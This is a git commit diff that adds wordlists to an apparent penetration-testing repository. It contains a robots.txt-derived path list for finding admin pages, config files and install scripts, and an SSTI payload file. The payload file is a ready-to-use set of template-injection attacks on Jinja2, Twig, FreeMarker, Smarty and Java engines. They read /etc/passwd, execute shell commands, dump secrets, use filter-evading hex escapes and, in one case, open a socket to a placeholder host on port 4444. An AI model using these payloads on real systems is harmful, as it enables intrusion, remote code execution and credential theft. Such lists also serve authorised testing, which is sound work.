Added some new wordlists (#4)

Co-authored-by: Krypton <root@krypton.ninja>
2023-04-30 16:18:00 +05:30
parent d1b02d887b
commit 58eaef5687
9 changed files with 533383 additions and 0 deletions
--- a/README.md
+++ b/README.md
@@ -28,10 +28,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
  <details>
  <summary>Directory Scanners</summary>
  <ul>
    <li><a href="directory_scanner/apache.txt">Apache</a> - 13'232 Lines</li>
    <li><a href="directory_scanner/apache_user_enum_1.0.txt">Apache User Enum 1.0</a> - 8'915 Lines</li>
    <li><a href="directory_scanner/apache_user_enum_2.0.txt">Apache User Enum 2.0</a> - 10'340 Lines</li>
    <li><a href="directory_scanner/big.txt">Big</a> - 20'468 Lines</li>
    <li><a href="directory_scanner/common.txt">Common</a> - 4'612 Lines</li>
    <li><a href="directory_scanner/conf.txt">Conf</a> - 100'926 Lines</li>
    <li><a href="directory_scanner/directories.txt">Directories</a> - 58'655 Lines</li>
    <li><a href="directory_scanner/directory_list_1.0.txt">Directory List 1.0</a> - 141'693 Lines</li>
    <li><a href="directory_scanner/directory_list_2.3_medium.txt">Directory List 2.3 Medium</a> - 220'545 Lines</li>
@@ -39,8 +41,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
    <li><a href="directory_scanner/directory_list_lowercase_2.3_medium.txt">Directory List Lowercase 2.3 Medium</a> - 207'628 Lines</li>
    <li><a href="directory_scanner/directory_list_lowercase_2.3_small.txt">Directory List Lowercase 2.3 Small</a> - 81'628 Lines</li>
    <li><a href="directory_scanner/extensions_common.txt">Extensions Common</a> - 27 Lines</li>
    <li><a href="directory_scanner/fuzz_php_special.txt">Fuzz PHP Special</a> - 136'921 Lines</li>
    <li><a href="directory_scanner/indexes.txt">Indexes</a> - 9 Lines</li>
    <li><a href="directory_scanner/joomla.txt">Joomla</a> - 1'543 Lines</li>
    <li><a href="directory_scanner/jsp.txt">JSP</a> - 92'216 Lines</li>
    <li><a href="directory_scanner/most_common.txt">Most Common</a> - 1'011 Lines</li>
    <li><a href="directory_scanner/robotx.txt">Robots</a> - 990 Lines</li>
    <li><a href="directory_scanner/sensitive_files_unix.txt">Sensitive Files Unix</a> - 15 Lines</li>
    <li><a href="directory_scanner/sensitive_files_win.txt">Sensitive Files Windows</a> - 6 Lines</li>
    <li><a href="directory_scanner/top_subdomains.txt">Top Subdomains</a> - 114'531 Lines</li>
@@ -324,6 +330,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
    <li><a href="vulnerabilities/jboss.txt">JBoss</a> - 18 Lines</li>
    <li><a href="vulnerabilities/jersey.txt">Jersey</a> - 120 Lines</li>
    <li><a href="vulnerabilities/jrun.txt">JRun</a> - 12 Lines</li>
    <li><a href="vulnerabilities/juicy_files.txt">Juicy Files</a> - 187'964 Lines</li>
    <li><a href="vulnerabilities/netware.txt">NetWare</a> - 59 Lines</li>
    <li><a href="vulnerabilities/oracle.txt">Oracle</a> - 1'074 Lines</li>
    <li><a href="vulnerabilities/ror.txt">ROR</a> - 120 Lines</li>
@@ -331,6 +338,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
    <li><a href="vulnerabilities/sharepoint.txt">SharePoint</a> - 1'707 Lines</li>
    <li><a href="vulnerabilities/sql_inj.txt">SQL Injections</a> - 40 Lines</li>
    <li><a href="vulnerabilities/sql.txt">SQL</a> - 125 Lines</li>
    <li><a href="vulnerabilities/ssti.txt">SSTI</a> - 107 Lines</li>
    <li><a href="vulnerabilities/sunas.txt">Sunas</a> - 50 Lines</li>
    <li><a href="vulnerabilities/tests.txt">Test</a> - 32 Lines</li>
    <li><a href="vulnerabilities/tomcat.txt">Tomcat</a> - 86 Lines</li>
@@ -346,10 +354,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
 <hr>
 * Directory Scanners
  * [Apache](directory_scanner/apache.txt) - 13'232 Lines
  * [Apache User Enum 1.0](directory_scanner/apache_user_enum_1.0.txt) - 8'915 Lines
  * [Apache User Enum 2.0](directory_scanner/apache_user_enum_2.0.txt) - 10'340 Lines
  * [Big](directory_scanner/big.txt) - 20'468 Lines
  * [Common](directory_scanner/common.txt) - 4'612 Lines
  * [Conf](directory_scanner/conf.txt) - 100'926 Lines
  * [Directories](directory_scanner/directories.txt) - 58'655 Lines
  * [Directory List 1.0](directory_scanner/directory_list_1.0.txt) - 141'693 Lines
  * [Directory List 2.3 Medium](directory_scanner/directory_list_2.3_medium.txt) - 220'545 Lines
@@ -357,8 +367,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
  * [Directory List Lowercase 2.3 Medium](directory_scanner/directory_list_lowercase_2.3_medium.txt) - 207'628 Lines
  * [Directory List Lowercase 2.3 Small](directory_scanner/directory_list_lowercase_2.3_small.txt) - 81'628 Lines
  * [Extensions Common](directory_scanner/extensions_common.txt) - 27 Lines
  * [Fuzz PHP Special](directory_scanner/fuzz_php_special.txt) - 136'921 Lines
  * [Indexes](directory_scanner/indexes.txt) - 9 Lines
  * [Joomla](directory_scanner/joomla.txt) - 1'543 Lines
  * [JSP](directory_scanner/jsp.txt) - 92'216 Lines
  * [Most Common](directory_scanner/most_common.txt) - 1'011 Lines
  * [Robots](directory_scanner/robots.txt) - 990 Lines
  * [Sensitive Files Unix](directory_scanner/sensitive_files_unix.txt) - 15 Lines
  * [Sensitive Files Windows](directory_scanner/sensitive_files_win.txt) - 6 Lines
  * [Top Subdomains](directory_scanner/top_subdomains.txt) - 114'531 Lines
@@ -587,6 +601,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
  * [JBoss](vulnerabilities/jboss.txt) - 18 Lines
  * [Jersey](vulnerabilities/jersey.txt) - 120 Lines
  * [JRun](vulnerabilities/jrun.txt) - 12 Lines
  * [Juicy Files](vulnerabilities/juicy_files.txt) - 187'964 Lines
  * [NetWare](vulnerabilities/netware.txt) - 59 Lines
  * [Oracle](vulnerabilities/oracle.txt) - 1'074 Lines
  * [ROR](vulnerabilities/ror.txt) - 120 Lines
@@ -594,6 +609,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
  * [SharePoint](vulnerabilities/sharepoint.txt) - 1'707 Lines
  * [SQL Injections](vulnerabilities/sql_inj.txt) - 40 Lines
  * [SQL](vulnerabilities/sql.txt) - 125 Lines
  * [SSTI](vulnerabilities/ssti.txt) - 107 Lines
  * [Sunas](vulnerabilities/sunas.txt) - 50 Lines
  * [Test](vulnerabilities/tests.txt) - 32 Lines
  * [Tomcat](vulnerabilities/tomcat.txt) - 86 Lines
--- a/directory_scanner/apache.txt
+++ b/directory_scanner/apache.txt
--- a/directory_scanner/conf.txt
+++ b/directory_scanner/conf.txt
--- a/directory_scanner/fuzz_php_special.txt
+++ b/directory_scanner/fuzz_php_special.txt
--- a/directory_scanner/jsp.txt
+++ b/directory_scanner/jsp.txt
--- a/directory_scanner/most_common.txt
+++ b/directory_scanner/most_common.txt
--- a/directory_scanner/robots.txt
+++ b/directory_scanner/robots.txt
@@ -0,0 +1,990 @@
 /1000paket
 /1000perex.php
 /1000p.php
 /1000prosm
 /1000prosm.php
 /1000rassil
 /1000rassil.php
 /1000servis.php
 /1000text.php
 /13629693
 /2012.php
 /404.html
 /405.html
 /5let.php
 /7294873
 /about/actions/
 /aboutinformer
 /aboutinformer2.php
 /abuse.php
 *?action
 /*action=ADD2BASKET
 /*action=ADD_TO_COMPARE_LIST
 /*action=BUY
 /*action=DELETE_FROM_COMPARE_LIST
 /active.php
 /*act=viewinfo*
 *add*
 /addnews.html
 /*add_search=*
 /*?adm
 /admin
 /admin*
 /admin/
 /admin2.php
 /administrator/
 /admin.php
 admin.php
 /advert.php
 /aff-bin
 /affiche.php
 /*ajax=
 /ajax/
 /ajax.php
 /amy695806155/
 /annuaire-professio/
 /api
 /api/
 /api.php
 /appointment/
 /apps/
 /archive/
 arch.php
 /asc/
 /*.asp*
 /*.aspx$
 /attachment/
 /auth/
 /author
 /auth.php
 /*auth=yes
 /*back_url=*
 /*backurl=*
 /*BACK_URL=*
 /*BACKURL=*
 /*back_url_admin=*
 /banks/request
 /bank/upload.php
 /basket/
 /basket/add/*
 /bbs/admin.php
 /bbs/api/
 /bbs/api.php
 /bbs/config/
 /bbs/data/
 /bbs/forum.php?mod=post*
 /bbs/forum.php?mod=redirect*
 /bbs/home.php?mod=spacecp*
 /bbs/install/
 /bbs/member.php
 /bbs/misc.php
 /bbs/search.php
 /bbs/source/
 /bbs/static/
 /bbs/template/
 /bbs/uc_client/
 /bbs/uc_server/
 /bin.aspx?ID*
 /*bitrix_*=
 /bitrix/
 /blank_paket2.php
 /blank_paket.php
 /blocks/
 /blogs
 /board/
 /b-product
 /b-product*
 */brand-/*
 /*?brand_
 /bundles/*
 /cabinet
 /cache/
 /captcha.php
 /cars/question/
 /cart
 /cart/
 /catalog/
 /catalog/alert.aspx
 /catalog/default.aspx
 /catalog/drugstore.aspx
 /catalog/product_compare/
 /catalog/raion.aspx
 /catalog/search*.aspx
 /catalog/spravochnaia-aptek.aspx
 /catégorie/
 /category/
 /cert/
 /cgi-bin
 /cgi-bin/
 /CHANGELOG.txt
 /*change_password=yes
 /chatgatewaycounts/
 /chatping/
 /checkout
 /*Chld
 /ck.php
 /click.php
 /club/$
 /club/forum/search/
 /club/gallery/tags/
 /club/group/search/
 /club/log/
 /club/messages/
 /club/search/
 /cmdynet
 /cmedianet
 /cms/FR-FR/pneu-4x4/pneu/4x4/ATTURO/BF-GOODRICH/ALL-TERRAIN-T-A-KO.html
 /cms/FR-FR/pneu-4x4/pneu/4x4/BF-GOODRICH/BRIDGESTONE/DUELER-A-T-694.html
 /cms/FR-FR/pneu-4x4/pneu/4x4/BRIDGESTONE/BRIDGESTONE/TOYO/INSA-TURBO/HANKOOK/BF-GOODRICH/INSA-TURBO/RANGER.html
 /cms/FR-FR/pneu-4x4/pneu/4x4/HANKOOK/HANKOOK/DYNAPRO-MT-RT03.html
 /cms/FR-FR/pneu-4x4/pneu/4x4/TOYO/ATTURO/BRIDGESTONE/INSA-TURBO/BRIDGESTONE/ATTURO/AZ800.html
 /cms/FR-FR/pneu-hiver/saison/hiver/HANKOOK/VREDESTEIN/MICHELIN/ALPIN-5.html
 /cms/FR-FR/pneu-hiver/saison/hiver/VREDESTEIN/MICHELIN/X-ICE-XI3.html
 /collection/
 /comment.php
 /comment/reply/
 */comments
 /comments
 /comments/feed/
 /common/
 /commons/
 /communication/blog/search.php
 /communication/forum/search/
 /communication/forum/user/
 /community/
 /comparemod/$
 /comparemod/*_vs$
 /compare/*_vs$
 /complaint/
 /components/
 /config/
 /connect.php
 /contact/
 /contacts/*
 /content
 /content1
 /content/board/my/
 /content/links/my/
 /counters
 /createcard
 /cron.php
 /csagent/
 /css/
 /cssikexin/
 /cswjjd/
 /customer/
 /cycle_image.php
 /data/
 /db/
 /db/autos.html?r
 /db/autos/*?p
 /delay
 /denunciar-anuncio/
 /deprecated_browser.html
 /detail/
 /*detail.php
 /developpeurs/*
 developpeurs/
 /dle-rules-page.html
 /*do=addnews
 /*do=feedback
 /*do=lastcomments
 /*do=lostpassword
 /*do=pm
 /*do=register
 /doski/
 /doski.php/doski.php
 /doski/senddoski.php
 /doski/sendpismo.php
 /*do=stats
 /download/
 /dynamic
 /email/
 /eng
 /engine/ajax/
 /engine/download.php
 /engine/go.php
 /error/
 /ErrorLog/
 espacepro*
 /estate/firmestate/firm
 /estate/teaseritems
 /e-store/affiliates/
 /e-store/paid/detail.php
 ex:
 /examples/download/download_private/
 /examples/my-components/
 */?f=*
 /?favorites
 /*?fb_xd_fragment
 /fcmedianet.js
 */feed
 /feed.php
 /feeds/
 /*filter_sended=
 /filter/tips/
 /final
 /firm/*/*.aspx
 /fonts/
 /*forgot_password=yes
 /forum/admin/
 /forum/cache/
 /forum/cgi-bin/
 /forumcp.php
 /forum/db/
 /forum/language/
 /forum.php?mod=post*
 /forum.php?mod=redirect*
 /*from=adwords
 /*?from=begun
 /*from=mail
 */from_ya
 /gal/
 /*/gallery/*order=*
 /gallery.php
 /game/*/play
 /games/*/play
 /*gclid
 /*ggl
 /*.gif$
 /go
 /goo2.php
 /goods_script.php
 /goo.php
 /groups
 /hack/
 /help/
 /help.php
 /help.php?
 /home.php?mod=spacecp*
 /how_to_choose/95728/
 /htdocs/
 /*image
 /images/
 /img/
 /*img/managers/docs/
 /imprimer/
 /imprimer/*
 /inc/
 /include
 /include/
 /includes/
 /index
 /index/
 /index$
 /index_dev.php
 /*index.php
 /index.php
 /index.php/
 /*index.php$
 /informer.php
 /info/rules
 /infrastructure/get_geo/
 /ingredients/
 /install
 /install/
 /installation/
 /INSTALL.mysql.txt
 /INSTALL.pgsql.txt
 /install.php
 /INSTALL.sqlite.txt
 /INSTALL.txt
 /interest/
 /ipdata/
 /job.php
 /*.jpg$
 /js/
 /js_no_index/
 /jsp/
 /kabinet.php
 /kredit/id
 /kurs/mforecast/
 /kurs/news/
 /kurs/RSS/
 /kurs/undefined
 /lang/
 */?lang.ru
 /language/
 /languages/
 /*level=12*
 /?level=12
 /*level=liger*
 /lib/
 /libraries/
 /LICENSE.txt
 /login/
 /login.php
 /*login=yes
 /logout
 /logout/
 /*logout=yes
 /logs/
 /loyalty/
 m.123i.com.br
 /mail/
 /MAINTAINERS.txt
 /manage/
 *mark_id*
 /*maxprice=*
 /media/
 /__media__/js/templates.js
 /mediamainlog.php
 /*member*
 /member/
 /member.php
 /members
 /message.php
 /*minprice=*
 /misc/
 /misc.php
 /mobile/
 /*mobile=yes*
 /*?mod=attachment*
 /mode/
 /*?mode=viewprofile
 /*?mod=misc*
 /modules/
 /?msk
 /mst/cache/images/
 /myauto
 /nalog?calc
 /*name=
 /network/
 /new-b-product
 /new-b-product*
 /new-product
 /new-product*
 /node/add/
 /note
 /notebooks/brand-/
 /notebooks/brand-packard%20bell/
 /obyavi.php
 /offers/buy/
 */OID_*
 /openapi/
 /*/?_openstat
 /*_openstat
 /*_openstat=
 /*openstat
 /opinion
 /optsale/last/toshiba_qosmio_x500_110.html
 /optsale/last/toshiba_t110_12g.html
 /optsale/last/toshiba_t130_16u.html
 /optsale/last/toshiba_u500_18p.html
 /optsale/last/toshiba_u500_1dq.html
 /optsale/last/toshiba_u500_1f4.html
 /*order=*
 /order
 /order/
 /*orderby=*
 /order-option
 /organiserenquiry
 /out/
 /out.php
 /owners/
 /*/page=
 /page/
 *?page=1
 /*/page-1/
 /page_confirm.asp
 /*PAGE_NAME=detail_slide_show
 /*PAGE_NAME=search
 /*PAGE_NAME=user_post
 /page.php
 /pageRight.html*
 /pages/displayCalculatorV2/
 /pages/interactives/sponsor-story/
 /panier
 /panier.html
 /parapharmacie/pharmacies/
 /parking.php4
 /*Password
 /pay/
 /pay1000/in.php
 /payment/
 /pda/
 /pdd/change/
 /pdd/exam/
 /pdd/init/
 /pdd/random/
 /pdd/themes/
 /pdd/user/stats/
 /*.pdf
 /pdf/
 /pdf.asp
 /*?pdg
 /peradmin/*
 /permalink/
 /personal/
 /personal_ads/
 /perto-de-mim/
 /pharmacies/
 /phb/jfb.htm*
 /phonebook/*.asp?*
 /phonebook/*.asp$
 /photoupload/
 /*.php
 /phpcms
 /phpmailer/
 /phpsso_server
 /p.html
 /pianor/
 /pic/
 /picture-gallery/sponsor-story/
 /*pid=
 /pingrong/
 /player/*
 /plugin.php?id=*
 /plugins/
 /plus/
 /plus/ad_js.php
 /plus/advancedsearch.php
 /plus/carbuyaction.php
 /plus/car.php
 /plus/count.php
 /plus/disdls.php
 /plus/erraddsave.php
 /plus/feedback_js.php
 /plus/list.php?tid=2078
 /plus/list.php?tid=2078&TotalResult=410&PageNo=
 /plus/mytag_js.php
 /plus/posttocar.php
 /plus/recommend.php
 /plus/rss.php
 /plus/search.php
 /plus/shops_buyaction.php
 /plus/stow.php
 /*&pm*
 /*?pm*
 /pm
 /pma/
 /poisk/
 /poiskmainz2.php
 /poll/
 /pomoc-a-kontakt/kontakt/
 /post/*?*
 /post1/
 /post/*.asp?*
 /post/*.asp$
 /post.php
 /pp/
 /price_item.aspx
 /*price_max=
 /*price_min=
 /primer-informers.php
 */print/
 *print
 /*&print=
 /*?print=
 /*print=
 /*print_course=Y
 /pri_submit.asp
 /private
 /pro/*/biz*
 /pro/*/bizmedia*
 /pro/*/contacts*
 /pro/*/contents*
 /pro/*/date*
 /product/
 /product.ac
 /product/advertisement.html
 /product_by_id/
 /product/company_news/about/legal_notice/supervision/index.html
 /product/company_news/cooperation/company_news/solutions/index.html
 /product/company_news/legal_notice/cooperation/service/index.html
 /product/company_news/legal_notice/supervision/legal_notice/index.html
 /product/company_news/service/company_news/solutions/index.html
 /product/company_news/supervision/company_news/cooperation/policy.html
 /product/cooperation/company_news/service/legal_notice/index.html
 /product/index.aspx
 /product/legal_notice/cooperation/company_news/company_news/index.html
 /product/legal_notice/cooperation/legal_notice/solutions/company_news/20140412v2.html
 /product/legal_notice/cooperation/legal_notice/solutions/company_news/supervision/joinus.html
 /product/legal_notice/cooperation/solutions/about/supervision/product/mall.html
 /product/legal_notice/product/supervision/company_news/index.html
 /product/list.aspx
 /productreview/
 *products
 /products/
 /product/service/service/legal_notice/about/about_us.html
 /product/solutions/solutions/legal_notice/about/index.html
 /produits/
 /produits-de-bar/contact_us.php
 /profile
 /profile/
 /profile.php
 /profiles/
 /pro/*/ldr*
 /pro/*/rating/*
 /pro/*/reserva*
 /psc/
 /psp/
 /psreports/
 /public_html/
 /publish/
 /pw8/
 /pw_ajax.php
 /pw_api.php
 /pw_app.php
 /pwr/123inkjets/pwr/885jwpi5/debug.html
 /pwr/123inkjets/pwr/885jwpi5/rawdata/
 /pwr/4inkjets/pwr/n9kd9e5d/debug.html
 /pwr/4inkjets/pwr/n9kd9e5d/rawdata/
 /pwr/simplyink/pwr/6n66vqj2/debug.html
 /pwr/simplyink/pwr/6n66vqj2/rawdata/
 /?q=*
 /?q=admin/
 /?q=comment/reply/
 /?q=contact/
 /?q=filter/tips/
 /qiche/*.asp?*
 /qiche/*.asp$
 /qiushengzhilu*
 /?q=logout/
 /?q=node/add/
 /qqajax.php
 /qqlive.htm
 /qqlive.html
 /?q=search/
 /quanto-vale-seu-apartamento/passo*
 /quero-comercializar-meu-apartamento/*
 /quero-contribuir-com-informacoes/*
 /*QUERY=
 /quisDizer/
 /?q=user/login/
 /?q=user/logout/
 /?q=user/password/
 /?q=user/register/
 /qy_about.aspx
 /qy_msg.aspx
 /qy_pro.aspx
 /qy_xx.aspx
 /random
 /rd/
 /rd1
 /rd2
 /rd.php*
 /readme.html
 /read.php
 /realty_map_data/
 /receive.php
 /recent/
 /recherche
 /recipes/
 /recommended/
 /redirect
 /redirect/
 /redo_form/
 /referers_list.php
 /regAndAsk.html*
 /region.php
 /*register
 /register/
 /register.html
 /register.php
 /register/vip_pay.html
 /*register=yes
 /related/*
 /rel/q/
 /remittance/
 /report.html
 /require/
 /res/
 /resource/activity/buyingingroup/index.html
 /respond.php
 /result/
 /result.php
 /reviews
 /reviews-Ratings
 /rjs/
 /robot/
 robots.txt
 /rongji/admin/
 /route/
 /rss/
 /rss-feeds/
 /rss.xml
 /rules.html
 /sakura/
 /sales
 /sales/
 /save
 /save-biz*
 /save_data.asp
 /save-pro*
 /scheme
 /school-lunch/*
 /scripts/
 /scripts/iefix.js
 *search*
 /*/search/
 /*search
 /search
 /search*
 /search/
 /search_*
 /search.asp
 /search.asp?word=*
 /search_ds/
 /search_keywords/*
 /search.php
 /searchProduct.ac
 /searchurl/
 /searchurl.php
 /seasons_commu/*
 /secure/
 /securimage/
 /selection_station_de_montage/
 /sell/*?*
 /seminarprojects/tag/
 /send
 /sendcard
 /sendpwd.php
 /sendurl
 /senyang/
 /server/
 /serverList/
 /servicequery
 /services
 /services/
 /services/*
 /servis-za-prodavce/
 /sezioni/1006/test
 /sezioni/1051/prova-diretta
 /sezioni/1269/widget-news
 /sezioni/1292/il-blog-di-leone-dilernia
 /sezioni/1306/ylenia
 /sezioni/1320/primo-piano-app-105
 /sezioni/1343/mobile-layout-test
 /sezioni/1352/html5-webradio
 /sezioni/1363/palinsesto-3-9-agosto
 /sezioni/1366/palinsesto-10-16-agosto
 /sezioni/1367/palinsesto-17-23-agosto
 /sezioni/1369/palinsesto-24-30-agosto
 /sezioni/1423/news-estate
 /sezioni/949/condizioni-generali-dei-servizi-offerti
 /sezioni/976/test-approvazione
 /shangjiahudong
 /share/
 /shengyuan/admin/
 /shimisi/
 /shitou/
 /shop/
 /shop/admin/
 /shopping_cart
 /shoppingcart.html
 /shopping-item/*
 /shop/shopmember/
 /*SHOWALL_1=
 /showerr.asp
 /showpro.aspx
 /signaler-erreur/
 /signaler-erreur/*
 /signin
 /sign-in.html
 /sign-out.html
 /signup
 /signup*
 /simple/
 /sites/
 /sitesearch.asp*
 /sjhd
 /skin/
 /skins/
 /*/slide_show/
 /sms/
 /so/
 /socs.js
 /soft/download.asp
 /soft/download.asp?softid=*
 /softeval.asp?*
 /soft/list.asp
 /soft/list.asp?classid=*
 /soft/previewimg.asp
 /soft/previewimg.asp?softid=*
 */?sort=*
 /sou-corretor-de-imoveis/
 /source/
 /spider-trap
 /sponsors/
 /*sputprtn
 /src/
 /ssd/
 /ssi/
 /ssl
 /*&st*
 /*?st*
 /s/tao/
 /stars/
 /static
 /static/
 /static/*.html
 /station_ok/
 /statistics.html
 /stats/
 /stats/count
 /store
 /store/*.asp?*
 /store/*.asp$
 /store_n/
 /story/draft/
 /story.php
 /story/sponsor-story/
 /*struct_id=*
 /*subaction=userinfo
 /subcatalog/
 /submit/
 /submit.php
 /*subpart=*
 /suggestion_keywords/autocomplete_suggestion
 /super-product*
 /survey/importCarownerData.aspx
 /survey.php
 /survey/SurveyFiles
 *.swf
 /*.swf
 /sycg2009/
 /sycon/
 /sydh/
 /syjc/
 /sys
 /system/
 /tag
 /tag/
 /tbxl/
 /tel-domain-registration/
 /temp/
 /tempcache/
 /tempImages/
 /template/
 /templates/
 /templets
 /temporada/*?q=
 /temporada/*?r&
 /tentarComprar/*
 /text
 /text/*
 /themes/
 /thread.php
 /thumb.php
 /timetable
 /tmp/
 /tns/
 /today/
 /to.htm?*
 /tools/
 /tools07073
 /top.asp
 /topic/*/smart/
 /top-sellers/
 /topten
 /topusers/
 /topusers.php
 /tourdesc
 /*tourpoisk
 /toutiaohuandeng*
 */trackback
 /trackback
 /trackback/
 /traf/map/
 /tranergy
 /transfer/
 /translate/
 /translator/
 /travel/$
 /tuan/*.asp?*
 /tuan/*.asp$
 /tupian
 /tupush/
 /tv_stanice_xml/
 /txt*
 /txt1.php
 /txt2.php
 /txt3.php
 /txt4.php
 /ubeogradu.rs/
 /uc
 /ucc
 /uc_client/
 /uc_server/
 /udaup.php
 /ugc/
 /ui/
 /uncategorized/test/
 /update.php
 /updates/
 /upfile/*
 /upgrade/
 /UPGRADE.txt
 /upimg/
 /upload/
 /uploadfiles/
 /upload.php
 /uploads/
 /upvoted/
 /user
 /user/
 /user/*
 /user/.
 /userapp.php?mod=app&*
 /user.asp*
 /userauth/
 /user/login/
 /user/logout/
 /user/password/
 /user.php
 /user/register/
 /users/
 /users/ajax/*
 /users/headermenu
 /users/popup/*
 /usr-bin
 /*utm
 /*utm_campaign=*
 /*utm_content=*
 /*utm_medium=*
 /*utm_source=
 /*utm_source=*
 /uuseeimg/
 /v/
 /v1_home/*
 /v1_popup/*
 /v3_index/wrong.html
 /v3_login/qzonelogin.html
 /v3_specialnr/
 /v5/action/secweborder/
 /v5/PayCenter/
 /v5/weborder/
 /va/
 /velikosrce/
 /version-info/
 /video/
 /video-recepty
 /videos/sponsor-story/
 /*?vidget
 /vietnamese/--------------------------
 */?view=*
 /viewimg_*
 /view.php
 /views/
 /vip
 /vip/
 /vipcard/
 /visitbelgrade.net/
 /visitbelgrade.rs/
 /visitorregister*
 /vklad/id
 /vocabulary/
 /vodnik/cgi-bin/
 /vodnik/htdocs/
 /vodnik/includes/
 /vodnik/sekret/
 /vodnik/tep/
 /vodnik/tmp/
 /vod-play*.html$
 /vod-search-*
 /vod-show*hits*.html$
 /vod-show-id-*-p-*.html$
 /vod-show*up*.html$
 /vote/
 /w/
 /wagon/admin/
 /wangyingran
 /wap/
 /watch*
 /wb/
 /webchatcce
 /webgame/
 /weborder/
 /webpage/
 /webservices/
 /wed/*.asp?*
 /wed/*.asp$
 /wed_n/
 /week/
 ?&what=
 /why/*
 /widget-118218/*
 /widget/head/login
 /wiki/
 /wind/
 /wingBanner/
 /wish/
 /wishlist
 /wishlist/
 /work1
 /*WorkingVersion
 /wp-admin
 /wp-admin/
 /wp-atom.php
 /wp-blog-header.php
 /wp-comments
 /wp-comments-post.php
 /wp-commentsrss2.php
 /wp-config.php
 /wp-content/
 /wp-content/cache
 /wp-content/cache/
 /wp-content/plugins
 /wp-content/plugins/
 /wp-content/themes
 /wp-feed.php
 /wp-includes
 /wp-includes/
 /wp-links-opml.php
 /wp-login.php
 /wp-mail.php
 /wp-pass.php
 /wp-rdf.php
 /wp-register.php
 /wp-rss2.php
 /wp-rss.php
 /wp-settings.php
 /wp-trackback
 /wp-trackback.php
 /write_a_review.php
 /wsauto/admin/
 /wuaiext/
 www2.123i.com.br
 /*x=
 /xd_receiver.htm
 /xhzd/
 /xian/zhuanti
 /xls_redirect/
 /xml
 /xml/
 /xml_feeds/
 /xmlrpc/
 /xmlrpc.php
 /y/
 /*Ya_
 /*?yclid
 /year/
 /yesterday/
 /yjx001/
 /ylyat/
 you
 /youhui/*.asp?*
 /youhui/*.asp$
 /youhui_n/
 /yp/*.asp?*
 /yp/*.asp$
 /yp/my/
 /ypxhmg/
 /ypxomg/
 /ypxrzg/
 /ypxsmg/
 /ywidget
 /yzjj/
 /z/
 /zapomenute_prihlasovaci_udaje.html
 /zhicheng/admin/
 /zhiyucainuan/
 /zhongda/admin/
 /zhuanti/reiz/admin/
 /zoomify/
 /zozm/
 /zrlist.aspx
 /zulin/admin/
 /zxjc/
 /笠勝電子有限公司-找工作機會-68848493.htm
--- a/vulnerabilities/SSTI.txt
+++ b/vulnerabilities/SSTI.txt
@@ -0,0 +1,107 @@
 {{4*4}}[[5*5]]
 {{7*7}}
 {{7*'7'}}
 <%= 7 * 7 %>
 ${3*3}
 ${{7*7}}
@(1+2)
 #{3*3}
 #{ 7 * 7 }
 {{dump(app)}}
 {{app.request.server.all|join(',')}}
 {{config.items()}}
 {{ [].class.base.subclasses() }}
 {{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
 {{'a'.toUpperCase()}} 
 {{ request }}
 {{self}}
 <%= File.open('/etc/passwd').read %>
 <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
 ${"freemarker.template.utility.Execute"?new()("id")}
 {{app.request.query.filter(0,0,1024,{'options':'system'})}}
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
 {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 {$smarty.version}
 {php}echo `id`;{/php}
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
 {{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
 {{request|attr(["_"*2,"class","_"*2]|join)}}
 {{request|attr(["__","class","__"]|join)}}
 {{request|attr("__class__")}}
 {{request.__class__}}
 {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 ${T(java.lang.System).getenv()}
 ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
